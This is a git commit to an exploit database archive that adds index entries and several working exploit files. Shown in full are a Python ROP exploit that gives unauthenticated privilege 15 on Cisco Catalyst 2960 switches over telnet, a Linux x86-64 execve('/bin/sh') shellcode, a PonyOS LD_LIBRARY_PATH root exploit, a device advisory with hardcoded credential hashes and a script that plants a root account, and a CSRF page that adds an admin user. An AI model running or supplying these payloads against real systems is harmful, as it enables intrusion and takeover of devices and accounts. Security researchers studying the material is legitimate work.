DB: 2017-04-14
12 new exploits Microsoft Windows Kernel win32k.sys - Multiple Bugs in the NtGdiGetDIBitsInternal System Call Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure PonyOS 3.0 - tty ioctl() Local Kernel Exploit PonyOS 3.0 - TTY 'ioctl()' Local Kernel Exploit Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation Solaris 7 < 11 (x86 / SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Local Kernel Exploit Adobe Creative Cloud Desktop Application <= 4.0.0.185 - Privilege Escalation Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak) Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes) Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses SedSystems D3 Decimator - Multiple Vulnerabilities agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)
This commit is contained in:
parent
2ac6fc17c2
commit
aabd4b35b3
16 changed files with 1333 additions and 4 deletions
18
files.csv
18
files.csv
|
@ -5466,6 +5466,8 @@ id,file,description,date,author,platform,type,port
|
|||
41867,platforms/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0
|
||||
41868,platforms/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0
|
||||
41869,platforms/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",multiple,dos,0
|
||||
41879,platforms/windows/dos/41879.txt,"Microsoft Windows Kernel win32k.sys - Multiple Bugs in the NtGdiGetDIBitsInternal System Call",2017-04-13,"Google Security Research",windows,dos,0
|
||||
41880,platforms/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8520,7 +8522,7 @@ id,file,description,date,author,platform,type,port
|
|||
37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",windows,local,0
|
||||
37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0
|
||||
37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
|
||||
37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
||||
37183,platforms/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
||||
37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
|
||||
37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
|
||||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||
|
@ -8934,7 +8936,10 @@ id,file,description,date,author,platform,type,port
|
|||
41853,platforms/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local,0
|
||||
41854,platforms/macos/local/41854.txt,"Proxifier for Mac 2.17 / 2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local,0
|
||||
41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0
|
||||
41871,platforms/solaris/local/41871.sh,"Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local,0
|
||||
41871,platforms/solaris/local/41871.sh,"Solaris 7 < 11 (x86 / SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local,0
|
||||
41873,platforms/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local,0
|
||||
41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Local Kernel Exploit",2017-04-02,"Hacker Fantastic",linux,local,0
|
||||
41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application <= 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -9568,7 +9573,7 @@ id,file,description,date,author,platform,type,port
|
|||
3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69
|
||||
3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
|
||||
3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53
|
||||
3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0
|
||||
3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit",2007-03-23,"Jon Hart",multiple,remote,0
|
||||
3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143
|
||||
3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21
|
||||
3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0
|
||||
|
@ -15438,6 +15443,7 @@ id,file,description,date,author,platform,type,port
|
|||
41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
|
||||
41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
|
||||
41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
|
||||
41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16071,6 +16077,7 @@ id,file,description,date,author,platform,type,port
|
|||
41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
|
||||
41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
|
||||
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
|
||||
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37742,3 +37749,8 @@ id,file,description,date,author,platform,type,port
|
|||
41864,platforms/php/webapps/41864.txt,"Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution",2017-04-11,SecuriTeam,php,webapps,0
|
||||
41865,platforms/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",multiple,webapps,0
|
||||
41866,platforms/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",multiple,webapps,0
|
||||
41876,platforms/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses",2017-02-15,"Hacker Fantastic",php,webapps,0
|
||||
41877,platforms/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,multiple,webapps,9784
|
||||
41881,platforms/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps,0
|
||||
41882,platforms/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps,0
|
||||
41884,platforms/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
72
platforms/hardware/remote/41874.py
Executable file
72
platforms/hardware/remote/41874.py
Executable file
|
@ -0,0 +1,72 @@
|
|||
#!/usr/bin/python
|
||||
# Author:
|
||||
# Artem Kondratenko (@artkond)
|
||||
|
||||
import socket
|
||||
import sys
|
||||
from time import sleep
|
||||
|
||||
set_credless = True
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print sys.argv[0] + ' [host] --set/--unset'
|
||||
sys.exit()
|
||||
elif sys.argv[2] == '--unset':
|
||||
set_credless = False
|
||||
elif sys.argv[2] == '--set':
|
||||
pass
|
||||
else:
|
||||
print sys.argv[0] + ' [host] --set/--unset'
|
||||
sys.exit()
|
||||
|
||||
|
||||
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((sys.argv[1], 23))
|
||||
|
||||
print '[+] Connection OK'
|
||||
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
|
||||
#sleep(0.5)
|
||||
print '[+] Sending cluster option'
|
||||
|
||||
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
|
||||
|
||||
|
||||
|
||||
payload = '\xff\xfa\x24\x00'
|
||||
payload += '\x03CISCO_KITS\x012:'
|
||||
payload += 'A' * 116
|
||||
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
|
||||
#next bytes are shown as offsets from r1
|
||||
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
|
||||
if set_credless is True:
|
||||
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
|
||||
else:
|
||||
payload += '\x00\x04\xea\x58' # unset
|
||||
payload += 'BBBB' # +16(+0) r1 points here at second gadget
|
||||
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
|
||||
payload += 'CCCC' # +8
|
||||
payload += 'DDDD' # +12
|
||||
payload += 'EEEE' # +16(+0) r1 points here at third gadget
|
||||
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
|
||||
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
|
||||
payload += 'FFFF' # +12
|
||||
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
|
||||
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
|
||||
if set_credless:
|
||||
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
|
||||
else:
|
||||
payload += '\x00\x04\xe6\xf0' # unset
|
||||
payload += 'HHHH' # +12
|
||||
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
|
||||
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
|
||||
payload += 'JJJJ' # +8 r1 points here at third gadget
|
||||
payload += 'KKKK' # +12
|
||||
payload += 'LLLL' # +16
|
||||
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
|
||||
payload += ':15:' + '\xff\xf0'
|
||||
|
||||
s.send(payload)
|
||||
|
||||
print '[+] All done'
|
||||
|
||||
s.close()
|
85
platforms/lin_x86-64/shellcode/41883.txt
Executable file
85
platforms/lin_x86-64/shellcode/41883.txt
Executable file
|
@ -0,0 +1,85 @@
|
|||
Hi, This time I wanna to submit a shellcode whose length is 31Bytes , It's
|
||||
tested on Linux x86-64
|
||||
;===========================================================
|
||||
=====================
|
||||
; The MIT License
|
||||
;
|
||||
; Copyright (c) <year> <copyright holders>
|
||||
;
|
||||
; Permission is hereby granted, free of charge, to any
|
||||
person obtaining a copy
|
||||
; of this software and associated documentation files (the "
|
||||
Software"), to deal
|
||||
; in the Software without restriction, including without
|
||||
limitation the rights
|
||||
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
; copies of the Software, and to permit persons to whom the Software is
|
||||
; furnished to do so, subject to the following conditions:
|
||||
;
|
||||
; The above copyright notice and this permission notice shall be included in
|
||||
; all copies or substantial portions of the Software.
|
||||
;
|
||||
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
|
||||
NO EVENT SHALL THE
|
||||
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHER
|
||||
WISE, ARISING FROM,
|
||||
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
; THE SOFTWARE.
|
||||
;===========================================================
|
||||
=====================
|
||||
; Name : Linux/x86-64 - execve("/bin/sh") 31 Bytes
|
||||
; Author : WangYihang
|
||||
; Email : wangyihanger@gmail.com
|
||||
; Tested on: Linux_x86-64
|
||||
;===========================================================
|
||||
=====================
|
||||
; Shellcode (c array) :
|
||||
char shellcode[] = "
|
||||
\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05
|
||||
";
|
||||
;===========================================================
|
||||
=====================
|
||||
; Shellcode (python) :
|
||||
shellcode = "
|
||||
\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05
|
||||
"
|
||||
;===========================================================
|
||||
=====================
|
||||
; objdump -d ./shellcode
|
||||
shellcode: file format elf64-x86-64
|
||||
Disassembly of section .text:
|
||||
0000000000400080 <_start>:
|
||||
400080: 48 31 ff xor %rdi,%rdi
|
||||
400083: 48 31 f6 xor %rsi,%rsi
|
||||
400086: 48 31 d2 xor %rdx,%rdx
|
||||
400089: 48 31 c0 xor %rax,%rax
|
||||
40008c: 50 push %rax
|
||||
40008d: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
|
||||
400094: 2f 73 68
|
||||
400097: 53 push %rbx
|
||||
400098: 48 89 e7 mov %rsp,%rdi
|
||||
40009b: b0 3b mov $0x3b,%al
|
||||
40009d: 0f 05 syscall ============================
|
||||
=====================
|
||||
; Assembly language code :
|
||||
; You can asm it by using :
|
||||
; nasm -f elf64 ./shellcode.asm
|
||||
; ld -o shellcode shellcode.o
|
||||
global _start
|
||||
_start:
|
||||
xor rdi, rdi
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
xor rax, rax
|
||||
push rax
|
||||
; 68 73 2f 2f 6e 69 62 2f
|
||||
mov rbx, 68732f2f6e69622fH
|
||||
push rbx
|
||||
mov rdi, rsp
|
||||
mov al, 59
|
||||
syscall
|
||||
;===========================================================
|
||||
=====================
|
|
@ -1,8 +1,10 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/9712/info
|
||||
|
||||
Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.
|
||||
|
||||
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.
|
||||
*/
|
||||
|
||||
/*
|
||||
* lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
|
||||
|
|
31
platforms/linux/local/41875.py
Executable file
31
platforms/linux/local/41875.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/python
|
||||
#PonyOS 4.0 has added several improvements over previous releases
|
||||
#including support for setuid binaries and dynamic libraries. The
|
||||
#run-time linker does not sanitize environment variables when
|
||||
#running setuid files allowing for local root exploitation through
|
||||
#manipulated LD_LIBRARY_PATH. Requires build-essential installed
|
||||
#to compile the malicious library.
|
||||
import shutil
|
||||
import os
|
||||
|
||||
if __name__=="__main__":
|
||||
print("[+] fluttershy - dynamic linker exploit for ponyos 4.0")
|
||||
shutil.copyfile("/usr/lib/libc.so","/tmp/libc.so")
|
||||
shutil.copyfile("/usr/lib/libm.so","/tmp/libm.so")
|
||||
shutil.copyfile("/usr/lib/libpng15.so","/tmp/libpng15.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-graphics.so","/tmp/libtoaru-graphics.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-kbd.so","/tmp/libtoaru-kbd.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-rline.so","/tmp/libtoaru-rline.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-list.so","/tmp/libtoaru-list.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-sha2.so","/tmp/libtoaru-sha2.so")
|
||||
shutil.copyfile("/usr/lib/libtoaru-termemu.so","/tmp/libtoaru-termemu.so")
|
||||
shutil.copyfile("/usr/lib/libz.so", "/tmp/libz.so")
|
||||
fd = open("/tmp/lib.c","w")
|
||||
fd.write("#include <stdio.h>\n#include <stdlib.h>\n\n")
|
||||
fd.write("void toaru_auth_check_pass(char* username, char* password){\n")
|
||||
fd.write("\tprintf(\"[+] pony smash!\\n\");\n}\n")
|
||||
fd.close()
|
||||
os.system("gcc -fpic -c /tmp/lib.c")
|
||||
os.system("gcc -shared -o /tmp/libtoaru-toaru_auth.so /tmp/lib.o")
|
||||
os.environ["LD_LIBRARY_PATH"] = "/tmp"
|
||||
os.system("sudo sh")
|
|
@ -1,6 +1,8 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/8021/info
|
||||
|
||||
It has been reported that lbreakout2 is vulnerable to a format string issue in the login component. This may result in an attacker executing arbitrary code on a vulnerable host.
|
||||
*/
|
||||
|
||||
/*[ lbreakout[2-2.5+]: remote format string exploit. ]*
|
||||
* (only v2-2.5-beta1, or greater versions affected) *
|
||||
|
|
91
platforms/multiple/webapps/41877.txt
Executable file
91
platforms/multiple/webapps/41877.txt
Executable file
|
@ -0,0 +1,91 @@
|
|||
SedSystems D3 Decimator Multiple Vulnerabilities
|
||||
================================================
|
||||
Identification of the vulnerable device can be performed by scanning for
|
||||
TCP port 9784 which offers a default remote API. When connected to this
|
||||
device it will announce itself with "connected" or similar:
|
||||
|
||||
Connected to x.x.x.x.
|
||||
Escape character is '^]'.
|
||||
connected
|
||||
status
|
||||
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
|
||||
ping
|
||||
ping:ok
|
||||
|
||||
The web service by default has a user interface for accessing the RF
|
||||
spectrum analyzer capability. The device itself from the API can give
|
||||
raw remote access to I/Q samples so can be used to remotely sniff the
|
||||
RF spectrum. The Web Configuration Manager can be found on
|
||||
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.
|
||||
|
||||
Hardcoded credentials can be found in the /etc/passwd files contained
|
||||
within the default firmware since at least February 2013. The following
|
||||
entries can be found:
|
||||
|
||||
root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
|
||||
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
|
||||
|
||||
The admin user has a default password of "admin", at this time the root
|
||||
user password is unknown however there is no documented way of changing
|
||||
this trivially in a device. Using the "admin" user you can obtain a web
|
||||
session to the wcm.cgi and exploit a hidden arbitary file download
|
||||
vulnerability discovered by reverse engineering the firmware:
|
||||
|
||||
http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd
|
||||
|
||||
This will allow you to download any file and as the "admin" user has root
|
||||
privileges you can obtain access to any file on the device. To execute
|
||||
arbitary code you can make use of a vulnerbaility within the firmware
|
||||
flash routines. By uploading a crafted tarball that contains a "install"
|
||||
script in its root, the device will accept your firmware and then attempt
|
||||
to execute ./install if found as root, you can then cancel the "flash"
|
||||
process to prevent bricking/modifcation of the device. The problem is due
|
||||
to /usr/bin/install_flash which after using "tar" to unpack an archive
|
||||
to a tmp folder of /tmp/PID_of_tar does the following:
|
||||
|
||||
80 # If the archive contained its own install script then use that
|
||||
81
|
||||
82 if [ -x ./install ]; then
|
||||
83 ./install $all_args
|
||||
84 rc=$?
|
||||
85 exit $rc
|
||||
86 fi
|
||||
87
|
||||
|
||||
Using this vulnerability you can upload a .tar file containing an install
|
||||
file that looks like the following to obtain a root user account with
|
||||
adm1n/admin.
|
||||
|
||||
cat install
|
||||
#!/bin/sh
|
||||
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd
|
||||
|
||||
You can then SSH remotely to the device as PermitRootLogin is enabled
|
||||
by default.
|
||||
|
||||
E.g.
|
||||
|
||||
$ ssh -l adm1n x.x.x.x
|
||||
adm1n@x.x.x.x's password: admin
|
||||
# uname -a
|
||||
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
|
||||
# cat /proc/cpuinfo
|
||||
Processor : ARM926EJ-S rev 4 (v5l)
|
||||
BogoMIPS : 103.83
|
||||
Features : swp half thumb fastmult vfp edsp java
|
||||
CPU implementer : 0x41
|
||||
CPU architecture: 5TEJ
|
||||
CPU variant : 0x0
|
||||
CPU part : 0x926
|
||||
CPU revision : 4
|
||||
|
||||
Hardware : SED 32XX Based CCA
|
||||
Revision : 0000
|
||||
Serial : 0000000000000000
|
||||
#
|
||||
|
||||
Vendor website can be found at the following url:
|
||||
* http://www.sedsystems.ca/decimator_spectrum_analyzer
|
||||
|
||||
-- prdelka
|
||||
|
134
platforms/multiple/webapps/41881.html
Executable file
134
platforms/multiple/webapps/41881.html
Executable file
|
@ -0,0 +1,134 @@
|
|||
<!--
|
||||
Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt
|
||||
|
||||
Advisory ID: SYSS-2017-008
|
||||
Product: agorum core Pro
|
||||
Manufacturer: agorum Software GmbH
|
||||
Affected Version(s): 7.8.1.4-251
|
||||
Tested Version(s): 7.8.1.4-251
|
||||
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
|
||||
Risk Level: Medium
|
||||
Solution Status: Open
|
||||
Manufacturer Notification: 2017-02-06
|
||||
Solution Date: 2017-04-06
|
||||
Public Disclosure: 2017-04-12
|
||||
CVE Reference: Not yet assigned
|
||||
Author of Advisory: Sascha Grimmeisen & Dr. Erlijn van Genuchten, SySS GmbH
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Overview:
|
||||
|
||||
agorum core Pro is a module based Document Management System. It allows
|
||||
the customer to buy only required modules and can be extended when
|
||||
needed.
|
||||
|
||||
Due to missing protection mechanisms, the web application component is
|
||||
vulnerable to cross-site request forgery (CSRF) attacks.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Vulnerability Details:
|
||||
|
||||
The tested web application component offers no protection against cross-
|
||||
site request forgery (CSRF) attacks. This kind of attack forces end
|
||||
users respectively their web browsers to perform unwanted actions in a
|
||||
web application context in which they are currently authenticated.
|
||||
|
||||
CSRF attacks specifically target state-changing requests, for example in
|
||||
order to enable or disable a feature, and not data theft, as an attacker
|
||||
usually has no possibility to see the response of the forged request.
|
||||
|
||||
In general, CSRF attacks are conducted with the help of the victim, for
|
||||
example by a user visiting an attacker-controlled URL sent by e-mail in
|
||||
its web browser. Often, cross-site request forgery attacks make use of
|
||||
cross-site scripting attacks, but this is not mandatory.
|
||||
|
||||
CSRF attacks can also be performed against a web application if a victim
|
||||
is only visiting an attacker-controlled web server. In this case, the
|
||||
attacker-controlled web server is used to generate a specially crafted
|
||||
HTTP request in the context of the user's web browser which is then sent
|
||||
to the vulnerable target web application.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
||||
The following HTML file containing a web form generates a simple crafted
|
||||
HTTP POST request that can be used to add an administration user to the
|
||||
web application in the context of an administrative user.
|
||||
|
||||
PoC HTML file to add an administration user 'ADDEDUSER' with the password
|
||||
'PASSWORD123':
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<img src="https://[HOST]/roiwebui/roiwebui_module/genericEditMaskSaveAction.do?interSaveIdent=¤tTabName=&attribute(name)=ADDEDUSER&attribute(aliases)=&attribute(credentialManager)=roi&attribute(passWord1)=PASSWORD123&attribute(passWord2)=PASSWORD123&attribute(adminEnabled)=on&attribute(description)=&attribute(familyName)=ADDEDUSER&attribute(givenName)=GmbH&attribute(emailAddress)=ADDEDUSER@EXAMPLE.COM&attribute(sendingEmailAddress)=&attribute(language)=de&attribute(mandatorIdentifier)=&attribute(defaultRole)=&attribute(associatedRole)=&folderId=1002356&portalTabNumber=1004&myTabNumber=1005&editMaskName=UserObjectEditMask&portalTabNumber=1004&attribute(selectedTab)=2">
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Solution:
|
||||
|
||||
Update to agorum core 7.11.3. [4]
|
||||
|
||||
